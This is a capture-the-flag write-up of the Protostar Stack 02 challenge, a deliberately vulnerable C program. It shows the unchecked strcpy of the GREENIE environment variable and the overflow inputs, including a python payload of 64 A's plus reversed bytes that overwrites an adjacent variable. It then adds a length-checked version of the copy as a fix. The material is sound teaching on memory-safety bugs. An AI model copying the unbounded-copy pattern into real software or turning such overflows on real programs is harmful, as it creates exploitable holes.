Protostar - Stack 02

May 05, 2018

Let’s take a look at the code of this challenge.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* declares errx() */

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  /* no length check: a GREENIE value longer than 63 bytes writes past buffer */
  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

As we can see, the program declares buffer, modified and variable. variable is loaded from the environment variable GREENIE and copied into buffer with strcpy, which performs no length check. This time the condition to satisfy is different: if(modified == 0x0d0a0d0a).

$ ./stack2
stack2: please set the GREENIE environment variable

But let’s remember the previous challenges: buffer is 64 bytes long, so a 66-byte value will overwrite 2 bytes of the modified variable. We can simply export the GREENIE environment variable with 66 A letters assigned to it.

What will happen?

$ export GREENIE=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ ./stack2
Try again, you got 0x00004141

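As you can see, that’s the same kind of vulnerability as in the previous challenges. Now we can finish it with the last commands. The four bytes after the 64 A letters are given in reverse order (\x0a\x0d\x0a\x0d) because x86 is little-endian, so they are read back as 0x0d0a0d0a.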

$ GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
$ export GREENIE
$ ./stack2
you have correctly modified the variable
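
For comparison, here is the same flow with the unchecked strcpy replaced by a length-checked copy. This is an added example, not part of the original challenge source; the helper names copy_bounded and check_greenie are made up for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 64   /* same size as buffer[] in the challenge */

/* Copy src into dst only when it fits, NUL terminator included.
 * Returns 0 on success, -1 when src is missing or too long (dst untouched). */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size)
        return -1;                 /* no room for the terminator: reject */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Same flow as the challenge's main(), with strcpy replaced by the bounded
 * copy. Returns -1 when the value is rejected, otherwise the final value of
 * modified, which can now only be 0. */
long check_greenie(const char *value)
{
    volatile int modified = 0;
    char buffer[BUF_SIZE];

    if (copy_bounded(buffer, sizeof buffer, value) != 0)
        return -1;
    return modified;
}

int main(void)
{
    long result = check_greenie(getenv("GREENIE"));

    if (result < 0) {
        fprintf(stderr, "GREENIE is unset or longer than %d bytes\n",
                BUF_SIZE - 1);
        return 1;
    }
    printf("modified is still 0x%08lx\n", (unsigned long)result);
    return 0;
}
```

With this check, both the 66-byte value and the 68-byte value used above are rejected before anything is written to buffer.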
